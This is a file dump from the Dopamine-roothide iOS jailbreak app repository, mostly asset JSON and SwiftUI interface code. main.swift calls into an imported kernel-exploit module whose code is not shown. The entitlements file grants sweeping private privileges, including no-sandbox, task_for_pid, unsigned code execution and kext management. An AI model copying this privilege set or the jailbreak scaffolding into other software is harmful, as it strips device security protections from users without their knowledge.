/Dopamine/Dopamine/Assets.xcassets/Backgrounds/Clouds.imageset/Clouds@3x.jpg: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/roothide/Dopamine-roothide/cb9d8a03f0aa16f090bb783764bb93393f7908bf/Dopamine/Dopamine/Assets.xcassets/Backgrounds/Clouds.imageset/Clouds@3x.jpg -------------------------------------------------------------------------------- /Dopamine/Dopamine/Assets.xcassets/Backgrounds/Clouds.imageset/Contents.json: -------------------------------------------------------------------------------- 1 | { 2 | "images" : [ 3 | { 4 | "filename" : "Clouds.png", 5 | "idiom" : "universal", 6 | "scale" : "1x" 7 | }, 8 | { 9 | "filename" : "Clouds@2x.png", 10 | "idiom" : "universal", 11 | "scale" : "2x" 12 | }, 13 | { 14 | "filename" : "Clouds@3x.jpg", 15 | "idiom" : "universal", 16 | "scale" : "3x" 17 | } 18 | ], 19 | "info" : { 20 | "author" : "xcode", 21 | "version" : 1 22 | } 23 | } 24 | -------------------------------------------------------------------------------- /Dopamine/Dopamine/Assets.xcassets/Backgrounds/Contents.json: -------------------------------------------------------------------------------- 1 | { 2 | "info" : { 3 | "author" : "xcode", 4 | "version" : 1 5 | } 6 | } 7 | -------------------------------------------------------------------------------- /Dopamine/Dopamine/Assets.xcassets/Backgrounds/Wallpaper.imageset/Contents.json: -------------------------------------------------------------------------------- 1 | { 2 | "images" : [ 3 | { 4 | "idiom" : "universal", 5 | "scale" : "1x" 6 | }, 7 | { 8 | "idiom" : "universal", 9 | "scale" : "2x" 10 | }, 11 | { 12 | "filename" : "pexels-soubhagya-maharana-4124435.jpg", 13 | "idiom" : "universal", 14 | "scale" : "3x" 15 | } 16 | ], 17 | "info" : { 18 | "author" : "xcode", 19 | "version" : 1 20 | } 21 | } 22 | -------------------------------------------------------------------------------- 
/Dopamine/Dopamine/Assets.xcassets/Backgrounds/Wallpaper.imageset/pexels-soubhagya-maharana-4124435.jpg: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/roothide/Dopamine-roothide/cb9d8a03f0aa16f090bb783764bb93393f7908bf/Dopamine/Dopamine/Assets.xcassets/Backgrounds/Wallpaper.imageset/pexels-soubhagya-maharana-4124435.jpg -------------------------------------------------------------------------------- /Dopamine/Dopamine/Assets.xcassets/Contents.json: -------------------------------------------------------------------------------- 1 | { 2 | "info" : { 3 | "author" : "xcode", 4 | "version" : 1 5 | } 6 | } 7 | -------------------------------------------------------------------------------- /Dopamine/Dopamine/Assets.xcassets/Easter Eggs/Contents.json: -------------------------------------------------------------------------------- 1 | { 2 | "info" : { 3 | "author" : "xcode", 4 | "version" : 1 5 | } 6 | } 7 | -------------------------------------------------------------------------------- /Dopamine/Dopamine/Assets.xcassets/Easter Eggs/fr.imageset/Contents.json: -------------------------------------------------------------------------------- 1 | { 2 | "images" : [ 3 | { 4 | "idiom" : "universal", 5 | "scale" : "1x" 6 | }, 7 | { 8 | "filename" : "fr.png", 9 | "idiom" : "universal", 10 | "scale" : "2x" 11 | }, 12 | { 13 | "idiom" : "universal", 14 | "scale" : "3x" 15 | } 16 | ], 17 | "info" : { 18 | "author" : "xcode", 19 | "version" : 1 20 | } 21 | } 22 | -------------------------------------------------------------------------------- /Dopamine/Dopamine/Assets.xcassets/Easter Eggs/fr.imageset/fr.png: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/roothide/Dopamine-roothide/cb9d8a03f0aa16f090bb783764bb93393f7908bf/Dopamine/Dopamine/Assets.xcassets/Easter Eggs/fr.imageset/fr.png 
-------------------------------------------------------------------------------- /Dopamine/Dopamine/Assets.xcassets/Logos/Contents.json: -------------------------------------------------------------------------------- 1 | { 2 | "info" : { 3 | "author" : "xcode", 4 | "version" : 1 5 | } 6 | } 7 | -------------------------------------------------------------------------------- /Dopamine/Dopamine/Assets.xcassets/Logos/DopamineLogo.imageset/Contents.json: -------------------------------------------------------------------------------- 1 | { 2 | "images" : [ 3 | { 4 | "filename" : "DopamineLogo@1x.png", 5 | "idiom" : "universal", 6 | "scale" : "1x" 7 | }, 8 | { 9 | "filename" : "DopamineLogo@2x.png", 10 | "idiom" : "universal", 11 | "scale" : "2x" 12 | }, 13 | { 14 | "filename" : "DopamineLogo@3x.png", 15 | "idiom" : "universal", 16 | "scale" : "3x" 17 | } 18 | ], 19 | "info" : { 20 | "author" : "xcode", 21 | "version" : 1 22 | } 23 | } 24 | -------------------------------------------------------------------------------- /Dopamine/Dopamine/Assets.xcassets/Logos/DopamineLogo.imageset/DopamineLogo@1x.png: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/roothide/Dopamine-roothide/cb9d8a03f0aa16f090bb783764bb93393f7908bf/Dopamine/Dopamine/Assets.xcassets/Logos/DopamineLogo.imageset/DopamineLogo@1x.png -------------------------------------------------------------------------------- /Dopamine/Dopamine/Assets.xcassets/Logos/DopamineLogo.imageset/DopamineLogo@2x.png: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/roothide/Dopamine-roothide/cb9d8a03f0aa16f090bb783764bb93393f7908bf/Dopamine/Dopamine/Assets.xcassets/Logos/DopamineLogo.imageset/DopamineLogo@2x.png -------------------------------------------------------------------------------- /Dopamine/Dopamine/Assets.xcassets/Logos/DopamineLogo.imageset/DopamineLogo@3x.png: 
-------------------------------------------------------------------------------- https://raw.githubusercontent.com/roothide/Dopamine-roothide/cb9d8a03f0aa16f090bb783764bb93393f7908bf/Dopamine/Dopamine/Assets.xcassets/Logos/DopamineLogo.imageset/DopamineLogo@3x.png -------------------------------------------------------------------------------- /Dopamine/Dopamine/Assets.xcassets/Logos/DopamineLogo2.imageset/Contents.json: -------------------------------------------------------------------------------- 1 | { 2 | "images" : [ 3 | { 4 | "filename" : "DopamineLogo@1x.png", 5 | "idiom" : "universal", 6 | "scale" : "1x" 7 | }, 8 | { 9 | "filename" : "DopamineLogo@2x.png", 10 | "idiom" : "universal", 11 | "scale" : "2x" 12 | }, 13 | { 14 | "filename" : "DopamineLogo@3x.png", 15 | "idiom" : "universal", 16 | "scale" : "3x" 17 | } 18 | ], 19 | "info" : { 20 | "author" : "xcode", 21 | "version" : 1 22 | } 23 | } 24 | -------------------------------------------------------------------------------- /Dopamine/Dopamine/Assets.xcassets/Logos/DopamineLogo2.imageset/DopamineLogo@1x.png: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/roothide/Dopamine-roothide/cb9d8a03f0aa16f090bb783764bb93393f7908bf/Dopamine/Dopamine/Assets.xcassets/Logos/DopamineLogo2.imageset/DopamineLogo@1x.png -------------------------------------------------------------------------------- /Dopamine/Dopamine/Assets.xcassets/Logos/DopamineLogo2.imageset/DopamineLogo@2x.png: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/roothide/Dopamine-roothide/cb9d8a03f0aa16f090bb783764bb93393f7908bf/Dopamine/Dopamine/Assets.xcassets/Logos/DopamineLogo2.imageset/DopamineLogo@2x.png -------------------------------------------------------------------------------- /Dopamine/Dopamine/Assets.xcassets/Logos/DopamineLogo2.imageset/DopamineLogo@3x.png: 
-------------------------------------------------------------------------------- https://raw.githubusercontent.com/roothide/Dopamine-roothide/cb9d8a03f0aa16f090bb783764bb93393f7908bf/Dopamine/Dopamine/Assets.xcassets/Logos/DopamineLogo2.imageset/DopamineLogo@3x.png -------------------------------------------------------------------------------- /Dopamine/Dopamine/Assets.xcassets/Logos/FuguTransparent.imageset/Artboard copy 2.png: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/roothide/Dopamine-roothide/cb9d8a03f0aa16f090bb783764bb93393f7908bf/Dopamine/Dopamine/Assets.xcassets/Logos/FuguTransparent.imageset/Artboard copy 2.png -------------------------------------------------------------------------------- /Dopamine/Dopamine/Assets.xcassets/Logos/FuguTransparent.imageset/Artboard copy.png: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/roothide/Dopamine-roothide/cb9d8a03f0aa16f090bb783764bb93393f7908bf/Dopamine/Dopamine/Assets.xcassets/Logos/FuguTransparent.imageset/Artboard copy.png -------------------------------------------------------------------------------- /Dopamine/Dopamine/Assets.xcassets/Logos/FuguTransparent.imageset/Artboard.png: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/roothide/Dopamine-roothide/cb9d8a03f0aa16f090bb783764bb93393f7908bf/Dopamine/Dopamine/Assets.xcassets/Logos/FuguTransparent.imageset/Artboard.png -------------------------------------------------------------------------------- /Dopamine/Dopamine/Assets.xcassets/Logos/FuguTransparent.imageset/Contents.json: -------------------------------------------------------------------------------- 1 | { 2 | "images" : [ 3 | { 4 | "filename" : "Artboard copy.png", 5 | "idiom" : "universal", 6 | "scale" : "1x" 7 | }, 8 | { 9 | "filename" : "Artboard.png", 10 | "idiom" : "universal", 11 | "scale" 
: "2x" 12 | }, 13 | { 14 | "filename" : "Artboard copy 2.png", 15 | "idiom" : "universal", 16 | "scale" : "3x" 17 | } 18 | ], 19 | "info" : { 20 | "author" : "xcode", 21 | "version" : 1 22 | }, 23 | "properties" : { 24 | "template-rendering-intent" : "template" 25 | } 26 | } 27 | -------------------------------------------------------------------------------- /Dopamine/Dopamine/Assets.xcassets/Logos/PinautenLogo.imageset/Contents.json: -------------------------------------------------------------------------------- 1 | { 2 | "images" : [ 3 | { 4 | "filename" : "Pinauten_Logo_SecResearch_4096 copy 2.png", 5 | "idiom" : "universal", 6 | "scale" : "1x" 7 | }, 8 | { 9 | "filename" : "Pinauten_Logo_SecResearch_4096 copy.png", 10 | "idiom" : "universal", 11 | "scale" : "2x" 12 | }, 13 | { 14 | "filename" : "Pinauten_Logo_SecResearch_4096.png", 15 | "idiom" : "universal", 16 | "scale" : "3x" 17 | } 18 | ], 19 | "info" : { 20 | "author" : "xcode", 21 | "version" : 1 22 | }, 23 | "properties" : { 24 | "template-rendering-intent" : "template" 25 | } 26 | } 27 | -------------------------------------------------------------------------------- /Dopamine/Dopamine/Assets.xcassets/Logos/PinautenLogo.imageset/Pinauten_Logo_SecResearch_4096 copy 2.png: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/roothide/Dopamine-roothide/cb9d8a03f0aa16f090bb783764bb93393f7908bf/Dopamine/Dopamine/Assets.xcassets/Logos/PinautenLogo.imageset/Pinauten_Logo_SecResearch_4096 copy 2.png -------------------------------------------------------------------------------- /Dopamine/Dopamine/Assets.xcassets/Logos/PinautenLogo.imageset/Pinauten_Logo_SecResearch_4096 copy.png: -------------------------------------------------------------------------------- 
https://raw.githubusercontent.com/roothide/Dopamine-roothide/cb9d8a03f0aa16f090bb783764bb93393f7908bf/Dopamine/Dopamine/Assets.xcassets/Logos/PinautenLogo.imageset/Pinauten_Logo_SecResearch_4096 copy.png -------------------------------------------------------------------------------- /Dopamine/Dopamine/Assets.xcassets/Logos/PinautenLogo.imageset/Pinauten_Logo_SecResearch_4096.png: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/roothide/Dopamine-roothide/cb9d8a03f0aa16f090bb783764bb93393f7908bf/Dopamine/Dopamine/Assets.xcassets/Logos/PinautenLogo.imageset/Pinauten_Logo_SecResearch_4096.png -------------------------------------------------------------------------------- /Dopamine/Dopamine/Assets.xcassets/Logos/discord.imageset/Contents.json: -------------------------------------------------------------------------------- 1 | { 2 | "images" : [ 3 | { 4 | "idiom" : "universal", 5 | "scale" : "1x" 6 | }, 7 | { 8 | "idiom" : "universal", 9 | "scale" : "2x" 10 | }, 11 | { 12 | "filename" : "discord-mark-white.png", 13 | "idiom" : "universal", 14 | "scale" : "3x" 15 | } 16 | ], 17 | "info" : { 18 | "author" : "xcode", 19 | "version" : 1 20 | }, 21 | "properties" : { 22 | "template-rendering-intent" : "template" 23 | } 24 | } 25 | -------------------------------------------------------------------------------- /Dopamine/Dopamine/Assets.xcassets/Logos/discord.imageset/discord-mark-white.png: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/roothide/Dopamine-roothide/cb9d8a03f0aa16f090bb783764bb93393f7908bf/Dopamine/Dopamine/Assets.xcassets/Logos/discord.imageset/discord-mark-white.png -------------------------------------------------------------------------------- /Dopamine/Dopamine/Assets.xcassets/Logos/github.imageset/Contents.json: -------------------------------------------------------------------------------- 1 | { 2 | "images" : [ 3 | { 
4 | "idiom" : "universal", 5 | "scale" : "1x" 6 | }, 7 | { 8 | "idiom" : "universal", 9 | "scale" : "2x" 10 | }, 11 | { 12 | "filename" : "GitHub-Mark-64px.png", 13 | "idiom" : "universal", 14 | "scale" : "3x" 15 | } 16 | ], 17 | "info" : { 18 | "author" : "xcode", 19 | "version" : 1 20 | }, 21 | "properties" : { 22 | "template-rendering-intent" : "template" 23 | } 24 | } 25 | -------------------------------------------------------------------------------- /Dopamine/Dopamine/Assets.xcassets/Logos/github.imageset/GitHub-Mark-64px.png: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/roothide/Dopamine-roothide/cb9d8a03f0aa16f090bb783764bb93393f7908bf/Dopamine/Dopamine/Assets.xcassets/Logos/github.imageset/GitHub-Mark-64px.png -------------------------------------------------------------------------------- /Dopamine/Dopamine/Assets.xcassets/Package Managers/Contents.json: -------------------------------------------------------------------------------- 1 | { 2 | "info" : { 3 | "author" : "xcode", 4 | "version" : 1 5 | } 6 | } 7 | -------------------------------------------------------------------------------- /Dopamine/Dopamine/Assets.xcassets/Package Managers/Sileo.imageset/Contents.json: -------------------------------------------------------------------------------- 1 | { 2 | "images" : [ 3 | { 4 | "filename" : "Sileo.png", 5 | "idiom" : "universal", 6 | "scale" : "1x" 7 | }, 8 | { 9 | "idiom" : "universal", 10 | "scale" : "2x" 11 | }, 12 | { 13 | "idiom" : "universal", 14 | "scale" : "3x" 15 | } 16 | ], 17 | "info" : { 18 | "author" : "xcode", 19 | "version" : 1 20 | } 21 | } 22 | -------------------------------------------------------------------------------- /Dopamine/Dopamine/Assets.xcassets/Package Managers/Sileo.imageset/Sileo.png: -------------------------------------------------------------------------------- 
https://raw.githubusercontent.com/roothide/Dopamine-roothide/cb9d8a03f0aa16f090bb783764bb93393f7908bf/Dopamine/Dopamine/Assets.xcassets/Package Managers/Sileo.imageset/Sileo.png -------------------------------------------------------------------------------- /Dopamine/Dopamine/Assets.xcassets/Package Managers/Zebra.imageset/Contents.json: -------------------------------------------------------------------------------- 1 | { 2 | "images" : [ 3 | { 4 | "filename" : "Zebra.png", 5 | "idiom" : "universal", 6 | "scale" : "1x" 7 | }, 8 | { 9 | "idiom" : "universal", 10 | "scale" : "2x" 11 | }, 12 | { 13 | "idiom" : "universal", 14 | "scale" : "3x" 15 | } 16 | ], 17 | "info" : { 18 | "author" : "xcode", 19 | "version" : 1 20 | } 21 | } 22 | -------------------------------------------------------------------------------- /Dopamine/Dopamine/Assets.xcassets/Package Managers/Zebra.imageset/Zebra.png: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/roothide/Dopamine-roothide/cb9d8a03f0aa16f090bb783764bb93393f7908bf/Dopamine/Dopamine/Assets.xcassets/Package Managers/Zebra.imageset/Zebra.png -------------------------------------------------------------------------------- /Dopamine/Dopamine/Assets.xcassets/Pinauten_Logo_SecResearch_1024.png: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/roothide/Dopamine-roothide/cb9d8a03f0aa16f090bb783764bb93393f7908bf/Dopamine/Dopamine/Assets.xcassets/Pinauten_Logo_SecResearch_1024.png -------------------------------------------------------------------------------- /Dopamine/Dopamine/Assets.xcassets/Pinauten_Logo_SecResearch_2048.png: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/roothide/Dopamine-roothide/cb9d8a03f0aa16f090bb783764bb93393f7908bf/Dopamine/Dopamine/Assets.xcassets/Pinauten_Logo_SecResearch_2048.png 
-------------------------------------------------------------------------------- /Dopamine/Dopamine/Assets.xcassets/Pinauten_Logo_SecResearch_4096.png: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/roothide/Dopamine-roothide/cb9d8a03f0aa16f090bb783764bb93393f7908bf/Dopamine/Dopamine/Assets.xcassets/Pinauten_Logo_SecResearch_4096.png -------------------------------------------------------------------------------- /Dopamine/Dopamine/Dopamine-Bridging-Header.h: -------------------------------------------------------------------------------- 1 | // 2 | // Use this file to import your target's public headers that you would like to expose to Swift. 3 | // 4 | 5 | #include 6 | 7 | #include "posix_spawn.h" 8 | #include "LSApplicationWorkspace.h" 9 | #include "LSApplicationProxy.h" 10 | -------------------------------------------------------------------------------- /Dopamine/Dopamine/Dopamine.entitlements: -------------------------------------------------------------------------------- 1 | 2 | 3 | 4 | 5 | com.apple.private.security.storage.AppBundles 6 | 7 | com.apple.private.security.storage.AppDataContainers 8 | 9 | com.apple.security.get-task-allow 10 | 11 | get-task-allow 12 | 13 | platform-application 14 | 15 | task_for_pid-allow 16 | 17 | run-unsigned-code 18 | 19 | proc_info-allow 20 | 21 | com.apple.private.persona-mgmt 22 | 23 | com.apple.private.tcc.allow 24 | 25 | kTCCServiceSystemPolicyAllFiles 26 | 27 | com.apple.private.security.storage-exempt.heritable 28 | 29 | com.apple.private.security.storage.AppBundles 30 | 31 | com.apple.private.security.no-sandbox 32 | 33 | com.apple.springboard.CFUserNotification 34 | 35 | com.apple.springboard.launchapplications 36 | 37 | com.apple.security.network.client 38 | 39 | com.apple.system-task-ports.control 40 | 41 | com.apple.system-task-ports.token.control 42 | 43 | com.apple.private.mobileinstall.allowedSPI 44 | 45 | InstallForLaunchServices 46 | 
Install 47 | UninstallForLaunchServices 48 | Uninstall 49 | UpdatePlaceholderMetadata 50 | 51 | com.apple.private.spawn-driver 52 | 53 | com.apple.developer.driverkit 54 | 55 | com.apple.developer.driverkit.transport.pci 56 | 57 | com.apple.developer.driverkit.builtin 58 | 59 | com.apple.developer.driverkit.transport.pci.offloadEngineDisable 60 | 61 | com.apple.private.security.kext-collection-management 62 | 63 | com.apple.private.security.kext-management 64 | 65 | com.apple.private.security.syspolicy.kext-management 66 | 67 | com.apple.security.exception.mach-lookup.global-name 68 | 69 | com.opa334.jailbreakd 70 | 71 | com.apple.security.exception.iokit-user-client-class 72 | 73 | AGXDeviceUserClient 74 | IOSurfaceRootUserClient 75 | 76 | com.apple.wifi.manager-access 77 | 78 | com.apple.security.exception.shared-preference.read-write 79 | 80 | com.opa334.Dopamine.roothide 81 | 82 | 83 | 84 | -------------------------------------------------------------------------------- /Dopamine/Dopamine/DopamineApp.swift: -------------------------------------------------------------------------------- 1 | // 2 | // Fugu15App.swift 3 | // Fugu15 4 | // 5 | // Created by Linus Henze. 
6 | // 7 | 8 | import SwiftUI 9 | 10 | var whatCouldThisVariablePossiblyEvenMean = { // true only when today is April 1 (day 1, month 4) in Calendar.current; the closure runs once, when this global is initialised 11 | let date = Date() 12 | let calendar = Calendar.current 13 | let components = calendar.dateComponents([.day, .month], from: date) 14 | 15 | return components.day == 1 && components.month == 4 16 | }() 17 | 18 | struct Fugu15App: App { // SwiftUI app type; no @main attribute is shown here, and main.swift calls Fugu15App.main() explicitly 19 | var body: some Scene { 20 | WindowGroup { 21 | JailbreakView() // root view of the only window group 22 | } 23 | } 24 | } 25 | -------------------------------------------------------------------------------- /Dopamine/Dopamine/Info.plist: -------------------------------------------------------------------------------- 1 | 2 | 3 | 4 | 5 | TSRootBinaries 6 | 7 | oobPCI 8 | tar 9 | 10 | UIViewControllerBasedStatusBarAppearance 11 | 12 | 13 | 14 | -------------------------------------------------------------------------------- /Dopamine/Dopamine/JailbreakView.swift: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/roothide/Dopamine-roothide/cb9d8a03f0aa16f090bb783764bb93393f7908bf/Dopamine/Dopamine/JailbreakView.swift -------------------------------------------------------------------------------- /Dopamine/Dopamine/Preview Content/Preview Assets.xcassets/Contents.json: -------------------------------------------------------------------------------- 1 | { 2 | "info" : { 3 | "author" : "xcode", 4 | "version" : 1 5 | } 6 | } 7 | -------------------------------------------------------------------------------- /Dopamine/Dopamine/UI/Classes/Logger.swift: -------------------------------------------------------------------------------- 1 | // 2 | // Logger.swift 3 | // Fugu15 4 | // 5 | // Created by exerhythm on 29.03.2023.
6 | // 7 | 8 | import SwiftUI 9 | 10 | struct LogMessage: Equatable, Identifiable { 11 | var id = UUID() 12 | var text: String 13 | var type: LogType 14 | 15 | enum LogType: RawRepresentable { 16 | case instant 17 | case continuous 18 | case success 19 | case error 20 | 21 | var rawValue: String { 22 | switch self { 23 | case .instant, .continuous: // both kinds share the "[*]" prefix 24 | return "[*]" 25 | case .success: 26 | return "[+]" 27 | case .error: 28 | return "E:" 29 | } 30 | } 31 | 32 | init?(rawValue: String) { 33 | switch rawValue { 34 | case "[*]": 35 | self = .instant // "[*]" always decodes to .instant, so .continuous does not round-trip through rawValue 36 | case "[+]": 37 | self = .success 38 | case "E:": 39 | self = .error 40 | default: 41 | return nil 42 | } 43 | } 44 | } 45 | } 46 | 47 | class Logger: ObservableObject { 48 | @Published var userFriendlyLogs: [LogMessage] = [] 49 | @Published var log: String = "" 50 | 51 | static var shared = Logger() 52 | 53 | /** 54 | * Append a message to the shared log, and optionally to the user-facing status list. 55 | * 56 | * - Parameter obj: The value to log; it is converted with String(describing:), printed, and appended to `log` 57 | * - Parameter type: Kind of entry (defaults to .continuous); its rawValue is the prefix written to `log`. Per the original note it also decides whether the action is instant or continuous, and if a spinner next to text should be shown 58 | * - Parameter isStatus: When true the localized text is also appended to `userFriendlyLogs`, which is what users who have "Simple Logs" option turned on see 59 | */ 60 | static func log(_ obj: Any, type: LogMessage.LogType = .continuous, isStatus: Bool = false) { 61 | let text = String(describing: obj) 62 | print(text) // NOTE(review): the raw text goes to print() as well as to `log`, so callers should not pass secrets 63 | shared.log += "\n\(type.rawValue) \(text)" 64 | if isStatus { 65 | shared.userFriendlyLogs.append(.init(text: NSLocalizedString(text, comment: "Jailbreak Status"), type: type)) // the message text itself is used as the localization key 66 | } 67 | } 68 | } 69 | -------------------------------------------------------------------------------- /Dopamine/Dopamine/UI/Extensions/Error++.swift: -------------------------------------------------------------------------------- 1 | // 2 | // Error++.swift 3 | // Fugu15 4 | // 5 | // Created by sourcelocation on 17/04/2023. 6 | // 7 | 8 | import Foundation 9 | 10 | extension String: LocalizedError { 11 | public var errorDescription: String?
{ return self } 12 | } 13 | -------------------------------------------------------------------------------- /Dopamine/Dopamine/UI/Views/MaterialView.swift: -------------------------------------------------------------------------------- 1 | // 2 | // MaterialView.swift 3 | // DebToIPA 4 | // 5 | // Created by exerhythm on 18.10.2022. 6 | // 7 | 8 | import SwiftUI 9 | 10 | struct MaterialView: UIViewRepresentable { 11 | let material: UIBlurEffect.Style 12 | 13 | init(_ material: UIBlurEffect.Style) { 14 | self.material = material 15 | } 16 | 17 | func makeUIView(context: Context) -> UIVisualEffectView { 18 | UIVisualEffectView(effect: UIBlurEffect(style: material)) 19 | } 20 | 21 | func updateUIView(_ uiView: UIVisualEffectView, context: Context) { 22 | uiView.effect = UIBlurEffect(style: material) 23 | } 24 | } 25 | -------------------------------------------------------------------------------- /Dopamine/Dopamine/UI/Views/PopupView.swift: -------------------------------------------------------------------------------- 1 | // 2 | // AlertView.swift 3 | // Dopamine 4 | // 5 | // Created by sourcelocation on 30/04/2023. 
6 | // 7 | 8 | import SwiftUI 9 | 10 | struct PopupView: View { 11 | 12 | @ViewBuilder var title: Title 13 | @ViewBuilder var contents: Content 14 | 15 | @Binding var isPresented: Bool 16 | 17 | var body: some View { 18 | VStack { 19 | ZStack { 20 | if isPresented { 21 | Color.black 22 | .ignoresSafeArea() 23 | .opacity(0.6) 24 | .onTapGesture { 25 | isPresented = false 26 | } 27 | .zIndex(2) 28 | VStack { 29 | title 30 | 31 | Divider() 32 | .background(.white) 33 | .padding(.horizontal, 32) 34 | .opacity(0.25) 35 | .frame(maxWidth: 320) 36 | 37 | contents 38 | } 39 | .padding(.vertical) 40 | .transition(.opacity.combined(with: .scale(scale: 0.9))) 41 | .background(MaterialView(.systemUltraThinMaterialDark) 42 | .cornerRadius(16)) 43 | .zIndex(3) 44 | } 45 | 46 | } 47 | .foregroundColor(.white) 48 | .animation(.spring().speed(1.5), value: isPresented) 49 | } 50 | } 51 | } 52 | -------------------------------------------------------------------------------- /Dopamine/Dopamine/bootstrap/Dopamine.roothide: -------------------------------------------------------------------------------- 1 | 1 2 | -------------------------------------------------------------------------------- /Dopamine/Dopamine/bootstrap/bootstrap-iphoneos-arm64.tar.zst: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/roothide/Dopamine-roothide/cb9d8a03f0aa16f090bb783764bb93393f7908bf/Dopamine/Dopamine/bootstrap/bootstrap-iphoneos-arm64.tar.zst -------------------------------------------------------------------------------- /Dopamine/Dopamine/bootstrap/libjbdrw.deb: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/roothide/Dopamine-roothide/cb9d8a03f0aa16f090bb783764bb93393f7908bf/Dopamine/Dopamine/bootstrap/libjbdrw.deb -------------------------------------------------------------------------------- /Dopamine/Dopamine/bootstrap/roothideapp.deb: 
-------------------------------------------------------------------------------- https://raw.githubusercontent.com/roothide/Dopamine-roothide/cb9d8a03f0aa16f090bb783764bb93393f7908bf/Dopamine/Dopamine/bootstrap/roothideapp.deb -------------------------------------------------------------------------------- /Dopamine/Dopamine/bootstrap/sileo.deb: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/roothide/Dopamine-roothide/cb9d8a03f0aa16f090bb783764bb93393f7908bf/Dopamine/Dopamine/bootstrap/sileo.deb -------------------------------------------------------------------------------- /Dopamine/Dopamine/bootstrap/zebra.deb: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/roothide/Dopamine-roothide/cb9d8a03f0aa16f090bb783764bb93393f7908bf/Dopamine/Dopamine/bootstrap/zebra.deb -------------------------------------------------------------------------------- /Dopamine/Dopamine/include/_LSApplicationState.h: -------------------------------------------------------------------------------- 1 | /* 2 | * This header is generated by classdump-dyld 1.0 3 | * on Friday, January 21, 2022 at 6:51:04 AM Pacific Standard Time 4 | * Operating System: Version 15.2.1 (Build 19C63) 5 | * Image Source: /System/Library/Frameworks/CoreServices.framework/CoreServices 6 | * classdump-dyld is licensed under GPLv3, Copyright © 2013-2016 by Elias Limneos. 
7 | */ 8 | 9 | #import 10 | //#import 11 | //#import 12 | //#import 13 | 14 | @class NSString; 15 | 16 | @interface _LSApplicationState : NSObject { 17 | 18 | NSString* _bundleIdentifier; 19 | unsigned long long _stateFlags; 20 | int _ratingRank; 21 | unsigned long long _installType; 22 | 23 | } 24 | 25 | @property (nonatomic,readonly) unsigned long long installType; 26 | @property (nonatomic,copy,readonly) NSString * bundleIdentifier; //@synthesize bundleIdentifier=_bundleIdentifier - In the implementation block 27 | @property (getter=isInstalled,nonatomic,readonly) BOOL installed; 28 | @property (getter=isPlaceholder,nonatomic,readonly) BOOL placeholder; 29 | @property (getter=isValid,nonatomic,readonly) BOOL valid; 30 | @property (getter=isRestricted,nonatomic,readonly) BOOL restricted; 31 | @property (getter=isRemovedSystemApp,nonatomic,readonly) BOOL removedSystemApp; 32 | @property (getter=isBlocked,nonatomic,readonly) BOOL blocked; 33 | @property (getter=isAlwaysAvailable,nonatomic,readonly) BOOL alwaysAvailable; 34 | @property (getter=isDowngraded,nonatomic,readonly) BOOL downgraded; 35 | +(BOOL)supportsSecureCoding; 36 | -(BOOL)isInstalled; 37 | -(void)addStateFlag:(unsigned long long)arg1 ; 38 | -(void)encodeWithCoder:(id)arg1 ; 39 | -(BOOL)isRemovedSystemApp; 40 | -(unsigned long long)installType; 41 | -(BOOL)isPlaceholder; 42 | -(BOOL)isRestricted; 43 | -(BOOL)isBlocked; 44 | -(id)description; 45 | -(id)initWithBundleIdentifier:(id)arg1 stateFlags:(unsigned long long)arg2 ratingRank:(int)arg3 installType:(unsigned long long)arg4 ; 46 | -(id)initWithCoder:(id)arg1 ; 47 | -(id)copyWithZone:(NSZone*)arg1 ; 48 | -(NSString *)bundleIdentifier; 49 | -(BOOL)isDowngraded; 50 | -(BOOL)isAlwaysAvailable; 51 | -(BOOL)isValid; 52 | @end 53 | 54 | -------------------------------------------------------------------------------- /Dopamine/Dopamine/main.swift: -------------------------------------------------------------------------------- 1 | // 2 | // main.swift 3 | 
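// Fugu15 4 | // 5 | // Created by Linus Henze on 2022-07-29. 6 | // 7 | 8 | import Foundation 9 | import Fugu15KernelExploit 10 | 11 | if CommandLine.arguments.count > 1 { // helper mode: the first argument selects a one-shot action 12 | switch CommandLine.arguments[1] { 13 | case "removeFuguInstallPlist": 14 | let path = Bundle.main.bundleURL 15 | 16 | let plist = path.appendingPathComponent("FuguInstall.plist") 17 | try? FileManager.default.removeItem(at: plist) // best effort: a removal failure is ignored 18 | 19 | exit(0) 20 | 21 | default: 22 | break 23 | } 24 | } 25 | 26 | Fugu15.mainHook() 27 | 28 | if isJailbroken() { 29 | // rootifyPath(path:) can return nil, so bind the result instead of force-unwrapping it. 30 | // The system directories stay first in PATH; the directories under the resolved root prefix are appended after them. 31 | if let rootPrefix = rootifyPath(path: "") { 32 | setenv("PATH", "/sbin:/bin:/usr/sbin:/usr/bin:\(rootPrefix)/sbin:\(rootPrefix)/bin:\(rootPrefix)/usr/sbin:\(rootPrefix)/usr/bin", 1) 33 | } 34 | 35 | let dpDefaults = dopamineDefaults() 36 | // Tweak injection is enabled exactly when the safe-mode marker file is absent. 37 | // If the marker path cannot be resolved, the stored preference is left untouched rather than crashing on a nil unwrap. 38 | if let safeModePath = rootifyPath(path: "basebin/.safe_mode") { 39 | let safeModeState = FileManager.default.fileExists(atPath: safeModePath) 40 | dpDefaults.set(!safeModeState, forKey: "tweakInjectionEnabled") 41 | } 42 | } 43 | 44 | Fugu15App.main() 45 | -------------------------------------------------------------------------------- /Dopamine/Makefile: -------------------------------------------------------------------------------- 1 | .PHONY: all clean build_clean 2 | 3 | all: Dopamine.tipa 4 | 5 | Dopamine.tipa: build/Build/Products/Debug-iphoneos/Dopamine.app 6 | @echo Ad-Hoc signing 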